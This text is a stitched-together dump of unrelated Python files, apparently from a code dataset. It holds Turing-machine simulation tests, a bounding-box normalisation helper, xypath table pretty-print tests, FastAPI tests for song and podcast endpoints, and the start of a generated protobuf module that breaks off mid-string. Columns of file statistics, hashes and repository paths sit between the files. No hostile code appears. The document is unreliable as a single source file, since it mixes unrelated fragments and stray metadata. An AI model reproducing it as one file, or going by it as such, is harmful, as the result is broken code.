                CELL[' ']: [HEAD['q6'], CELL[' '], TuringMachine.STAY],
                CELL['a']: [HEAD['q6'], CELL['a'], TuringMachine.STAY],
                CELL['b']: [HEAD['q6'], CELL['b'], TuringMachine.STAY],
                CELL['c']: [HEAD['q6'], CELL['c'], TuringMachine.STAY],
                CELL['x']: [HEAD['q6'], CELL['x'], TuringMachine.STAY],
                CELL['y']: [HEAD['q6'], CELL['y'], TuringMachine.STAY],
                CELL['z']: [HEAD['q6'], CELL['z'], TuringMachine.STAY]
            }
        }
        return HEAD, CELL, rule_table

    @staticmethod
    def _abcde_machine():
        """Build the 2-state machine over the {a..e} alphabet.

        Returns (HEAD, CELL, rule_table); shared by tests 1c and 2c.
        """
        HEAD = {"up": 1, "down": 2}
        CELL = {"a": 0, "b": 1, "c": 2, "d": 3, "e": 4}
        rule_table = {
            HEAD['up']: {
                CELL['a']: [HEAD['up'], CELL['b'], TuringMachine.LEFT],
                CELL['b']: [HEAD['up'], CELL['a'], TuringMachine.RIGHT],
                CELL['c']: [HEAD['up'], CELL['a'], TuringMachine.RIGHT],
                CELL['d']: [HEAD['down'], CELL['e'], TuringMachine.RIGHT],
                CELL['e']: [HEAD['down'], CELL['d'], TuringMachine.LEFT]
            },
            HEAD['down']: {
                CELL['a']: [HEAD['up'], CELL['d'], TuringMachine.LEFT],
                CELL['b']: [HEAD['up'], CELL['a'], TuringMachine.RIGHT],
                CELL['c']: [HEAD['up'], CELL['e'], TuringMachine.RIGHT],
                CELL['d']: [HEAD['down'], CELL['e'], TuringMachine.RIGHT],
                CELL['e']: [HEAD['down'], CELL['c'], TuringMachine.LEFT]
            }
        }
        return HEAD, CELL, rule_table

    def test_turing_machine1(self):
        HEAD, _, rule_table = self._onoff_machine()
        tm = HeadCentricTuringMachine(tape=[0] * 21, rule_table=rule_table,
                                      initial_head_state=HEAD['up'],
                                      initial_head_position=3, max_timesteps=61)
        trajectory = ntm.evolve(initial_conditions=tm.initial_conditions, network=tm.network,
                                activity_rule=tm.activity_rule, input=tm.input_function)
        tape_history, head_activities = tm.activities_for_plotting(trajectory)
        # (head state, head position) at each timestep
        expected_activities = [[(1, 3)], [(2, 4)], [(2, 3)], [(1, 2)], [(2, 3)], [(1, 2)], [(1, 3)], [(1, 4)],
                               [(1, 5)], [(2, 6)], [(2, 5)], [(1, 4)], [(2, 5)], [(1, 4)], [(1, 5)], [(1, 6)],
                               [(1, 7)], [(2, 8)], [(2, 7)], [(1, 6)], [(2, 7)], [(1, 6)], [(1, 7)], [(1, 8)],
                               [(1, 9)], [(2, 10)], [(2, 9)], [(1, 8)], [(2, 9)], [(1, 8)], [(1, 9)], [(1, 10)],
                               [(1, 11)], [(2, 12)], [(2, 11)], [(1, 10)], [(2, 11)], [(1, 10)], [(1, 11)], [(1, 12)],
                               [(1, 13)], [(2, 14)], [(2, 13)], [(1, 12)], [(2, 13)], [(1, 12)], [(1, 13)], [(1, 14)],
                               [(1, 15)], [(2, 16)], [(2, 15)], [(1, 14)], [(2, 15)], [(1, 14)], [(1, 15)], [(1, 16)],
                               [(1, 17)], [(2, 18)], [(2, 17)], [(1, 16)], [(2, 17)]]
        activities = ntm.get_activities_over_time_as_list(trajectory)
        np.testing.assert_equal(expected_activities, activities)
        expected_tape_history = self._convert_to_list_of_lists("turing_machine1-tape.ca")
        np.testing.assert_equal(expected_tape_history, tape_history)
        expected_head_activities = self._convert_to_list_of_lists("turing_machine1-head.ca", strings=True)
        np.testing.assert_equal(expected_head_activities, head_activities)

    def test_turing_machine1b(self):
        HEAD, CELL, rule_table = self._abc_machine()
        tape = " aabbcc "
        tm = HeadCentricTuringMachine(tape=[CELL[t] for t in tape], rule_table=rule_table,
                                      initial_head_state=HEAD['q0'], initial_head_position=2,
                                      terminating_state=HEAD['q6'], max_timesteps=50)
        trajectory = ntm.evolve(initial_conditions=tm.initial_conditions, network=tm.network,
                                activity_rule=tm.activity_rule, input=tm.input_function)
        tape_history, head_activities = tm.activities_for_plotting(trajectory)
        expected_activities = [[(0, 2)], [(1, 3)], [(1, 4)], [(2, 5)], [(2, 6)], [(3, 5)], [(3, 4)], [(3, 3)], [(3, 2)],
                               [(0, 3)], [(1, 4)], [(1, 5)], [(2, 6)], [(2, 7)], [(3, 6)], [(3, 5)], [(3, 4)], [(3, 3)],
                               [(0, 4)], [(4, 3)], [(4, 2)], [(4, 1)], [(5, 2)], [(5, 3)], [(5, 4)], [(5, 5)], [(5, 6)],
                               [(5, 7)], [(5, 8)], [(6, 8)]]
        activities = ntm.get_activities_over_time_as_list(trajectory)
        np.testing.assert_equal(expected_activities, activities)
        expected_tape_history = self._convert_to_list_of_lists("turing_machine1b-tape.ca")
        np.testing.assert_equal(expected_tape_history, tape_history)
        expected_head_activities = self._convert_to_list_of_lists("turing_machine1b-head.ca", strings=True)
        np.testing.assert_equal(expected_head_activities, head_activities)

    def test_turing_machine1c(self):
        HEAD, CELL, rule_table = self._abcde_machine()
        tape = "bbbbbbaeaaaaaaa"
        tm = HeadCentricTuringMachine(tape=[CELL[t] for t in tape], rule_table=rule_table,
                                      initial_head_state=HEAD['up'],
                                      initial_head_position=8, max_timesteps=58)
        trajectory = ntm.evolve(initial_conditions=tm.initial_conditions, network=tm.network,
                                activity_rule=tm.activity_rule, input=tm.input_function)
        tape_history, head_activities = tm.activities_for_plotting(trajectory)
        expected_activities = [[(1, 8)], [(1, 7)], [(2, 6)], [(1, 5)], [(1, 6)], [(2, 7)], [(2, 8)], [(1, 9)], [(1, 8)],
                               [(1, 7)], [(2, 6)], [(2, 5)], [(1, 4)], [(1, 5)], [(2, 6)], [(1, 7)], [(2, 8)], [(1, 9)],
                               [(1, 10)], [(1, 9)], [(1, 8)], [(1, 7)], [(2, 6)], [(2, 5)], [(2, 4)], [(1, 3)], [(1, 4)],
                               [(2, 5)], [(1, 6)], [(1, 7)], [(2, 8)], [(1, 9)], [(1, 10)], [(1, 11)], [(1, 10)], [(1, 9)],
                               [(1, 8)], [(1, 7)], [(2, 6)], [(1, 5)], [(2, 4)], [(2, 3)], [(1, 2)], [(1, 3)], [(2, 4)],
                               [(1, 5)], [(2, 6)], [(2, 7)], [(2, 8)], [(1, 9)], [(1, 10)], [(1, 11)], [(1, 12)],
                               [(1, 11)], [(1, 10)], [(1, 9)], [(1, 8)], [(1, 7)]]
        activities = ntm.get_activities_over_time_as_list(trajectory)
        np.testing.assert_equal(expected_activities, activities)
        expected_tape_history = self._convert_to_list_of_lists("turing_machine1c-tape.ca")
        np.testing.assert_equal(expected_tape_history, tape_history)
        expected_head_activities = self._convert_to_list_of_lists("turing_machine1c-head.ca", strings=True)
        np.testing.assert_equal(expected_head_activities, head_activities)

    def test_turing_machine2(self):
        # Same machine as test 1, driven through the tape-centric adapter.
        HEAD, _, rule_table = self._onoff_machine()
        tm = TapeCentricTuringMachine(n=21, rule_table=rule_table,
                                      initial_head_state=HEAD['up'],
                                      initial_head_position=3)
        initial_conditions = [0] * 21
        trajectory = ntm.evolve(initial_conditions=initial_conditions, network=tm.network,
                                activity_rule=tm.activity_rule, timesteps=61)
        head_activities = tm.head_activities(trajectory)
        expected_activities = self._convert_to_list_of_lists("turing_machine2.ca")
        activities = ntm.get_activities_over_time_as_list(trajectory)
        np.testing.assert_equal(expected_activities, activities)
        expected_head_activities = self._convert_to_list_of_lists("turing_machine2-head.ca", strings=True)
        np.testing.assert_equal(expected_head_activities, head_activities)

    def test_turing_machine2b(self):
        HEAD, CELL, rule_table = self._abc_machine()
        tape = " aabbcc "
        tm = TapeCentricTuringMachine(n=len(tape), rule_table=rule_table,
                                      initial_head_state=HEAD['q0'],
                                      initial_head_position=2)
        initial_conditions = [CELL[t] for t in tape]
        trajectory = ntm.evolve(initial_conditions=initial_conditions, network=tm.network,
                                activity_rule=tm.activity_rule, timesteps=61)
        head_activities = tm.head_activities(trajectory)
        expected_activities = self._convert_to_list_of_lists("turing_machine2b.ca")
        activities = ntm.get_activities_over_time_as_list(trajectory)
        np.testing.assert_equal(expected_activities, activities)
        expected_head_activities = self._convert_to_list_of_lists("turing_machine2b-head.ca", strings=True)
        np.testing.assert_equal(expected_head_activities, head_activities)

    def test_turing_machine2c(self):
        HEAD, CELL, rule_table = self._abcde_machine()
        tape = "bbbbbbaeaaaaaaa"
        tm = TapeCentricTuringMachine(n=len(tape), rule_table=rule_table,
                                      initial_head_state=HEAD['up'],
                                      initial_head_position=8)
        initial_conditions = [CELL[t] for t in tape]
        trajectory = ntm.evolve(initial_conditions=initial_conditions, network=tm.network,
                                activity_rule=tm.activity_rule, timesteps=58)
        head_activities = tm.head_activities(trajectory)
        expected_activities = self._convert_to_list_of_lists("turing_machine2c.ca")
        activities = ntm.get_activities_over_time_as_list(trajectory)
        np.testing.assert_equal(expected_activities, activities)
        expected_head_activities = self._convert_to_list_of_lists("turing_machine2c-head.ca", strings=True)
        np.testing.assert_equal(expected_head_activities, head_activities)
| 61.288026
| 123
| 0.486905
| 2,148
| 18,938
| 4.162011
| 0.051676
| 0.117897
| 0.112752
| 0.033557
| 0.946309
| 0.945526
| 0.940716
| 0.935235
| 0.925839
| 0.920022
| 0
| 0.041903
| 0.293062
| 18,938
| 308
| 124
| 61.487013
| 0.625859
| 0
| 0
| 0.727891
| 0
| 0
| 0.053913
| 0.011247
| 0
| 0
| 0
| 0
| 0.05102
| 1
| 0.020408
| false
| 0
| 0.010204
| 0
| 0.034014
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fe386cfff450389a866b20311a82232a01ea11d1
| 282
|
py
|
Python
|
data/operator/bbox/spatial/normalize.py
|
zhangzhengde0225/SwinTrack
|
526be17f8ef266cb924c6939bd8dda23e9b73249
|
[
"MIT"
] | 143
|
2021-12-03T02:33:36.000Z
|
2022-03-29T00:01:48.000Z
|
data/operator/bbox/spatial/normalize.py
|
zhangzhengde0225/SwinTrack
|
526be17f8ef266cb924c6939bd8dda23e9b73249
|
[
"MIT"
] | 33
|
2021-12-03T10:32:05.000Z
|
2022-03-31T02:13:55.000Z
|
data/operator/bbox/spatial/normalize.py
|
zhangzhengde0225/SwinTrack
|
526be17f8ef266cb924c6939bd8dda23e9b73249
|
[
"MIT"
] | 24
|
2021-12-04T06:46:42.000Z
|
2022-03-30T07:57:47.000Z
|
def bbox_normalize(bbox, image_size):
    """Scale bbox coordinates into the unit square.

    Even-indexed entries are divided by image_size[0], odd-indexed
    entries by image_size[1]; works for any even-length coordinate
    sequence and returns a tuple.

    NOTE(review): assumes bbox alternates x, y coordinates and that
    image_size is (width, height) — confirm with callers.
    """
    first, second = image_size[0], image_size[1]
    normalized = []
    for index, coord in enumerate(bbox):
        divisor = first if index % 2 == 0 else second
        normalized.append(coord / divisor)
    return tuple(normalized)
def bbox_denormalize(bbox, image_size):
    """Inverse of bbox_normalize: scale unit-square coordinates back.

    Even-indexed entries are multiplied by image_size[0], odd-indexed
    entries by image_size[1]; returns a tuple.
    """
    scales = (image_size[0], image_size[1])
    return tuple(coord * scales[index % 2]
                 for index, coord in enumerate(bbox))
| 40.285714
| 100
| 0.680851
| 54
| 282
| 3.407407
| 0.333333
| 0.293478
| 0.217391
| 0.206522
| 0.815217
| 0.815217
| 0.815217
| 0.815217
| 0.815217
| 0.815217
| 0
| 0.035088
| 0.191489
| 282
| 6
| 101
| 47
| 0.77193
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 13
|
22980b89ef09f9aad8d7b614611af3bbb6db5e3b
| 6,864
|
py
|
Python
|
test/test_pprint.py
|
mikeAdamss/xypath
|
688aedc59794c4e18ed65335c83df35e3417be24
|
[
"BSD-2-Clause"
] | 16
|
2017-03-02T13:47:16.000Z
|
2021-11-19T21:43:26.000Z
|
test/test_pprint.py
|
mikeAdamss/xypath
|
688aedc59794c4e18ed65335c83df35e3417be24
|
[
"BSD-2-Clause"
] | 17
|
2015-01-09T16:03:43.000Z
|
2016-09-26T11:09:00.000Z
|
test/test_pprint.py
|
mikeAdamss/xypath
|
688aedc59794c4e18ed65335c83df35e3417be24
|
[
"BSD-2-Clause"
] | 4
|
2015-04-23T00:10:44.000Z
|
2016-06-13T07:42:56.000Z
|
from __future__ import absolute_import
import tcore
import xypath
from textwrap import dedent
from io import StringIO
class TestPPrint(tcore.TCore):
    """Tests for cell-bag pprint/extrude output against hard-coded tables.

    NOTE(review): relies on ``self.table``, presumably loaded by
    tcore.TCore from a countries fixture — confirm in tcore.
    """

    def test_pprint(self):
        """
        test_pprint: basic check of pprint output against hard-coded string
        """
        # lstrip('\n') drops the newline that follows the opening quotes.
        EXPECTED_TABLE = dedent('''
/ C
--- -------------------------
274 American Samoa
275 Cook Islands
276 French Polynesia
277 Niue
278 Samoa
279 Tokelau
280 Tonga
281 Tuvalu
282 Wallis and Futuna Islands
''').lstrip('\n')
        cells = self.table.filter('Polynesia').fill(xypath.DOWN)
        stream = StringIO()
        cells.pprint(stream=stream)
        self.assertEqual(EXPECTED_TABLE, stream.getvalue())

    def test_pprint_removed_cell(self):
        """
        test_pprint_removed_cell: check that pprint's output is rectangular
        """
        # The removed Tonga cell is rendered as '/' so rows keep their shape.
        EXPECTED_TABLE = dedent('''
/ C
--- -------------------------
274 American Samoa
275 Cook Islands
276 French Polynesia
277 Niue
278 Samoa
279 Tokelau
280 /
281 Tuvalu
282 Wallis and Futuna Islands
''').lstrip('\n')
        cells = self.table.filter('Polynesia').fill(xypath.DOWN)
        cells_without_tonga = cells - cells.filter('Tonga')
        stream = StringIO()
        cells_without_tonga.pprint(stream=stream)
        self.assertEqual(EXPECTED_TABLE, stream.getvalue())

    def test_pprint_removed_cell_collapsed(self):
        """
        test_pprint_removed_cell_collapsed: check that a collapsed row works
        """
        # Row 280 disappears entirely when collapse_empty=True.
        EXPECTED_TABLE = dedent('''
/ C
--- -------------------------
274 American Samoa
275 Cook Islands
276 French Polynesia
277 Niue
278 Samoa
279 Tokelau
281 Tuvalu
282 Wallis and Futuna Islands
''').lstrip('\n')
        cells = self.table.filter('Polynesia').fill(xypath.DOWN)
        cells_without_tonga = cells - cells.filter('Tonga')
        stream = StringIO()
        cells_without_tonga.pprint(collapse_empty=True, stream=stream)
        self.assertEqual(EXPECTED_TABLE, stream.getvalue())

    def test_extrude(self):
        """
        test_extrude: check 2-to-the-left extrusion against hard-coded string
        """
        EXPECTED_TABLE = dedent('''
/ C D E
--- ------------------------- --- ---
274 American Samoa 16
275 Cook Islands 184
276 French Polynesia 258
277 Niue 570
278 Samoa 882
279 Tokelau 772
280 Tonga 776
281 Tuvalu 798
282 Wallis and Futuna Islands 876
''').lstrip('\n')
        # Below the word "Polynesia", there are a set of islands
        cells = self.table.filter('Polynesia').fill(xypath.DOWN)
        # Right of this column, there is an empty column followed by numbers.
        cells = cells.extrude(2, 0)
        stream = StringIO()
        cells.pprint(stream=stream)
        self.assertEqual(EXPECTED_TABLE, stream.getvalue())

    def test_extrude_negative(self):
        """
        test_extrude_negative: check negative extrusion
        """
        EXPECTED_TABLE = dedent('''
/ C D E
--- ------- --- ---
279 Tokelau 772
280 Tonga 776
281 Tuvalu 798
''').lstrip("\n")
        # Start from the number column two cells right of 'Tuvalu', then
        # extrude back up and to the left.
        cells = self.table.filter('Tuvalu').shift(2,0)
        cells = cells.extrude(-2, -2)
        stream = StringIO()
        cells.pprint(stream=stream)
        self.assertEqual(EXPECTED_TABLE, stream.getvalue())

    def test_pprint_collapsed_column(self):
        """
        test_pprint_collapsed_column: check empty column removal
        """
        # Column D is removed because it contains no itmes with bool(x) == True
        EXPECTED_TABLE = dedent('''
/ C E
--- ------------------------- ---
274 American Samoa 16
275 Cook Islands 184
276 French Polynesia 258
277 Niue 570
278 Samoa 882
279 Tokelau 772
280 Tonga 776
281 Tuvalu 798
282 Wallis and Futuna Islands 876
''').lstrip('\n')
        # Below the word "Polynesia", there are a set of islands
        cells = self.table.filter('Polynesia').assert_one().fill(xypath.DOWN)
        # Right of this column, there is an empty column followed by numbers.
        cells = cells.extrude(2, 0)
        stream = StringIO()
        # Collapse empty removes the empty column
        cells.pprint(collapse_empty=True, stream=stream)
        self.assertEqual(EXPECTED_TABLE, stream.getvalue())

    def test_pprint_collapsed_column_and_row(self):
        """
        test_pprint_collapsed_column_and_row: check row/column removal
        """
        # Column D is removed because it contains no itmes with bool(x) == True
        EXPECTED_TABLE = dedent('''
/ C E
--- ------------------------- ---
274 American Samoa 16
275 Cook Islands 184
276 French Polynesia 258
277 Niue 570
278 Samoa 882
279 Tokelau 772
281 Tuvalu 798
282 Wallis and Futuna Islands 876
''').lstrip('\n')
        # Below the word "Polynesia", there are a set of islands
        cells = self.table.filter('Polynesia').assert_one().fill(xypath.DOWN)
        # Right of this column, there is an empty column followed by numbers.
        cells = cells.extrude(2, 0)
        tonga = cells.filter("Tonga")
        # Remove cells in the same row as tonga
        cells -= cells.same_row(tonga)
        stream = StringIO()
        # Collapse empty removes the empty column
        cells.pprint(collapse_empty=True, stream=stream)
        self.assertEqual(EXPECTED_TABLE, stream.getvalue())
| 34.666667
| 79
| 0.488782
| 664
| 6,864
| 4.945783
| 0.180723
| 0.05542
| 0.040499
| 0.042631
| 0.861449
| 0.830694
| 0.804202
| 0.804202
| 0.784714
| 0.773752
| 0
| 0.064789
| 0.415355
| 6,864
| 197
| 80
| 34.84264
| 0.753551
| 0.155886
| 0
| 0.818182
| 0
| 0
| 0.523835
| 0.026681
| 0
| 0
| 0
| 0
| 0.068182
| 1
| 0.05303
| false
| 0
| 0.037879
| 0
| 0.098485
| 0.090909
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
22cb8a34c105ce9788f463bc957d843b02359595
| 6,037
|
py
|
Python
|
test/main_test.py
|
PawanRamaMali/audiojack-api
|
0e4c53718a7ba228e1d2715396806569fba77f5e
|
[
"MIT"
] | null | null | null |
test/main_test.py
|
PawanRamaMali/audiojack-api
|
0e4c53718a7ba228e1d2715396806569fba77f5e
|
[
"MIT"
] | null | null | null |
test/main_test.py
|
PawanRamaMali/audiojack-api
|
0e4c53718a7ba228e1d2715396806569fba77f5e
|
[
"MIT"
] | null | null | null |
from fastapi.testclient import TestClient
from main import app
import logging
# In-process test client bound to the FastAPI application under test.
client = TestClient(app)
# ------------------ Tests for Songs -------------------------- #
def test_get_song_nonexisting():
    """Fetching a song id that was never created must return HTTP 400."""
    resp = client.get("/get/Song/1")
    assert resp.status_code == 400
def test_delete_song_nonexisting():
    """Deleting a song id that does not exist must return HTTP 400."""
    resp = client.get("/delete/Song/1")
    assert resp.status_code == 400
def test_update_song_nonexisting():
    """Updating a song id that does not exist must return HTTP 400."""
    payload = {
        "name": "Levitating",
        "uploadTime": "2022-04-03T22:47:00.028Z",
        "duration": 1243,
    }
    resp = client.post("/update/Song/1", json=payload)
    assert resp.status_code == 400
def test_create_song():
    """Creating a new song succeeds and echoes back the id and file type."""
    payload = {
        "name": "Makeba",
        "uploadTime": "2022-04-03T22:47:00.028Z",
        "duration": 2121,
    }
    resp = client.post("/create?audioId=1&audioFileType=Song", json=payload)
    assert resp.status_code == 200
    expected = {
        "msg": "Success",
        "audioId": 1,
        "audioFileType": "Song",
    }
    assert resp.json() == expected
def test_get_song_existing():
    """After creation, fetching the song returns its full record (200)."""
    resp = client.get("/get/Song/1")
    assert resp.status_code == 200
    expected = {
        "name": "Makeba",
        "uploadTime": "2022-04-03T22:47:00.028000",
        "duration": 2121,
        "audioFileType": "Song",
        "audioId": 1
    }
    assert resp.json() == expected
def test_get_all_song_existing():
    """Listing all songs returns a one-element list with the created song."""
    resp = client.get("/get/Song")
    assert resp.status_code == 200
    expected_song = {
        "name": "Makeba",
        "uploadTime": "2022-04-03T22:47:00.028000",
        "duration": 2121,
        "audioFileType": "Song",
        "audioId": 1
    }
    assert resp.json() == [expected_song]
def test_update_song_existing():
    """Updating an existing song succeeds and echoes the id and file type."""
    payload = {
        "name": "Levitating",
        "uploadTime": "2022-04-03T22:47:00.028Z",
        "duration": 1243,
    }
    resp = client.post("/update/Song/1", json=payload)
    assert resp.status_code == 200
    expected = {
        "msg": "Success",
        "audioId": 1,
        "audioFileType": "Song",
    }
    assert resp.json() == expected
def test_delete_song_existing():
    """Deleting the previously created song must succeed with HTTP 200."""
    resp = client.get("/delete/Song/1")
    assert resp.status_code == 200
def test_large_song_name():
    """A song name longer than 100 characters is rejected with HTTP 422."""
    payload = {
        "name": "A"*101,
        "uploadTime": "2022-04-03T22:47:00.028Z",
        "duration": 2121,
    }
    resp = client.post("/create?audioId=1&audioFileType=Song", json=payload)
    assert resp.status_code == 422
# ------------------ Tests for Podcast -------------------------- #
def test_get_podcast_nonexisting():
    """Fetching a podcast id that was never created must return HTTP 400."""
    resp = client.get("/get/Podcast/1")
    assert resp.status_code == 400
def test_delete_podcast_nonexisting():
    """Deleting a podcast id that does not exist must return HTTP 400."""
    resp = client.get("/delete/Podcast/1")
    assert resp.status_code == 400
def test_update_podcast_nonexisting():
    """Updating a podcast id that does not exist must return HTTP 400."""
    payload = {
        "name": "The Pale Blue Dot",
        "uploadTime": "2022-04-03T22:47:00.028Z",
        "duration": 72847,
        "host": "Carl Sagan",
        "participants": ["John", "Bob"]
    }
    resp = client.post("/update/Podcast/1", json=payload)
    assert resp.status_code == 400
def test_create_podcast():
    """Creating a new podcast succeeds and echoes the id and file type."""
    payload = {
        "name": "The Pale Blue Dot",
        "uploadTime": "2022-04-03T22:47:00.028Z",
        "duration": 72847,
        "host": "Carl Sagan",
        "participants": ["John", "Bob"]
    }
    resp = client.post("/create?audioId=1&audioFileType=Podcast", json=payload)
    assert resp.status_code == 200
    expected = {
        "msg": "Success",
        "audioId": 1,
        "audioFileType": "Podcast",
    }
    assert resp.json() == expected
def test_get_podcast_existing():
    """After creation, fetching the podcast returns its full record (200)."""
    resp = client.get("/get/Podcast/1")
    assert resp.status_code == 200
    expected = {
        "audioId": 1,
        "audioFileType": "Podcast",
        "name": "The Pale Blue Dot",
        "uploadTime": "2022-04-03T22:47:00.028000",
        "duration": 72847,
        "host": "Carl Sagan",
        "participants": ["John", "Bob"]
    }
    assert resp.json() == expected
def test_update_podcast_existing():
    """Updating an existing podcast succeeds and echoes the id and type."""
    payload = {
        "name": "Our Planet",
        "uploadTime": "2022-04-03T22:47:00.028Z",
        "duration": 32341,
        "host": "David Attenborough",
        "participants": ["Marie", "Alice"]
    }
    resp = client.post("/update/Podcast/1", json=payload)
    assert resp.status_code == 200
    expected = {
        "msg": "Success",
        "audioId": 1,
        "audioFileType": "Podcast",
    }
    assert resp.json() == expected
def test_delete_podcast_existing():
    """Deleting the previously created podcast must succeed with HTTP 200."""
    resp = client.get("/delete/Podcast/1")
    assert resp.status_code == 200
def test_max_ten_participants():
    """More than ten podcast participants is rejected with HTTP 422."""
    payload = {
        "name": "ABC",
        "uploadTime": "2022-04-03T22:47:00.028Z",
        "duration": 72847,
        "host": "AC",
        "participants": ["John"]*12
    }
    resp = client.post("/create?audioId=1&audioFileType=Podcast", json=payload)
    assert resp.status_code == 422
def test_participant_name_max_100_chars():
    """A participant name over 100 characters is rejected with HTTP 422."""
    payload = {
        "name": "ABC",
        "uploadTime": "2022-04-03T22:47:00.028Z",
        "duration": 72847,
        "host": "AC",
        "participants": ["A"*102]*5
    }
    resp = client.post("/create?audioId=1&audioFileType=Podcast", json=payload)
    assert resp.status_code == 422
def test_duration_must_be_positive():
    """A negative duration is rejected with HTTP 422."""
    payload = {
        "name": "ABC",
        "uploadTime": "2022-04-03T22:47:00.028Z",
        "duration": -1,
        "host": "AC",
        "participants": ["A"]
    }
    resp = client.post("/create?audioId=1&audioFileType=Podcast", json=payload)
    assert resp.status_code == 422
| 27.193694
| 67
| 0.524267
| 597
| 6,037
| 5.170854
| 0.140704
| 0.117914
| 0.123097
| 0.147716
| 0.873988
| 0.810496
| 0.810496
| 0.772919
| 0.704244
| 0.674765
| 0
| 0.091834
| 0.316382
| 6,037
| 221
| 68
| 27.316742
| 0.656167
| 0.020871
| 0
| 0.702247
| 0
| 0
| 0.261518
| 0.09248
| 0
| 0
| 0
| 0
| 0.146067
| 1
| 0.106742
| false
| 0
| 0.016854
| 0
| 0.123596
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
22d40707cdbead43c67ffceaf6c297449af5c883
| 150,217
|
py
|
Python
|
lang/python/github/com/metaprov/modelaapi/pkg/apis/catalog/v1alpha1/generated_pb2.py
|
metaprov/modelaapi
|
64ab493dd73329196235e15776e5177c72281990
|
[
"Apache-2.0"
] | 5
|
2022-02-18T03:40:10.000Z
|
2022-03-01T16:11:24.000Z
|
lang/python/github/com/metaprov/modelaapi/pkg/apis/catalog/v1alpha1/generated_pb2.py
|
metaprov/modelaapi
|
64ab493dd73329196235e15776e5177c72281990
|
[
"Apache-2.0"
] | 1
|
2022-01-07T19:59:25.000Z
|
2022-02-04T01:21:14.000Z
|
lang/python/github/com/metaprov/modelaapi/pkg/apis/catalog/v1alpha1/generated_pb2.py
|
metaprov/modelaapi
|
64ab493dd73329196235e15776e5177c72281990
|
[
"Apache-2.0"
] | 1
|
2022-03-25T10:21:43.000Z
|
2022-03-25T10:21:43.000Z
|
# -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: github.com/metaprov/modelaapi/pkg/apis/catalog/v1alpha1/generated.proto
"""Generated protocol buffer code."""
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
# Default symbol database; the generated message types register here.
_sym_db = _symbol_database.Default()
from k8s.io.api.core.v1 import generated_pb2 as k8s_dot_io_dot_api_dot_core_dot_v1_dot_generated__pb2
from k8s.io.api.rbac.v1 import generated_pb2 as k8s_dot_io_dot_api_dot_rbac_dot_v1_dot_generated__pb2
from k8s.io.apimachinery.pkg.api.resource import generated_pb2 as k8s_dot_io_dot_apimachinery_dot_pkg_dot_api_dot_resource_dot_generated__pb2
from k8s.io.apimachinery.pkg.apis.meta.v1 import generated_pb2 as k8s_dot_io_dot_apimachinery_dot_pkg_dot_apis_dot_meta_dot_v1_dot_generated__pb2
from k8s.io.apimachinery.pkg.runtime import generated_pb2 as k8s_dot_io_dot_apimachinery_dot_pkg_dot_runtime_dot_generated__pb2
from k8s.io.apimachinery.pkg.runtime.schema import generated_pb2 as k8s_dot_io_dot_apimachinery_dot_pkg_dot_runtime_dot_schema_dot_generated__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='github.com/metaprov/modelaapi/pkg/apis/catalog/v1alpha1/generated.proto',
package='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1',
syntax='proto2',
serialized_options=b'Z7github.com/metaprov/modelaapi/pkg/apis/catalog/v1alpha1',
create_key=_descriptor._internal_create_key,
serialized_pb=b'\nGgithub.com/metaprov/modelaapi/pkg/apis/catalog/v1alpha1/generated.proto\x12\x37github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1\x1a\"k8s.io/api/core/v1/generated.proto\x1a\"k8s.io/api/rbac/v1/generated.proto\x1a\x34k8s.io/apimachinery/pkg/api/resource/generated.proto\x1a\x34k8s.io/apimachinery/pkg/apis/meta/v1/generated.proto\x1a/k8s.io/apimachinery/pkg/runtime/generated.proto\x1a\x36k8s.io/apimachinery/pkg/runtime/schema/generated.proto\"\xa5\x01\n\tAlgorithm\x12\x42\n\x08metadata\x18\x01 \x01(\x0b\x32\x30.k8s.io.apimachinery.pkg.apis.meta.v1.ObjectMeta\x12T\n\x04spec\x18\x02 \x01(\x0b\x32\x46.github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.AlgorithmSpec\"\xa4\x01\n\rAlgorithmList\x12@\n\x08metadata\x18\x01 \x01(\x0b\x32..k8s.io.apimachinery.pkg.apis.meta.v1.ListMeta\x12Q\n\x05items\x18\x02 \x03(\x0b\x32\x42.github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.Algorithm\"\x98\x03\n\rAlgorithmSpec\x12\x15\n\rframeworkName\x18\x01 \x01(\t\x12\x13\n\x0b\x64\x65scription\x18\x02 \x01(\t\x12\x0b\n\x03url\x18\x03 \x01(\t\x12\x0c\n\x04task\x18\x04 \x01(\t\x12\x0e\n\x06sparse\x18\x05 \x01(\x08\x12`\n\x11integerParameters\x18\x06 \x03(\x0b\x32\x45.github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.IntParameter\x12`\n\x0f\x66loatParameters\x18\x07 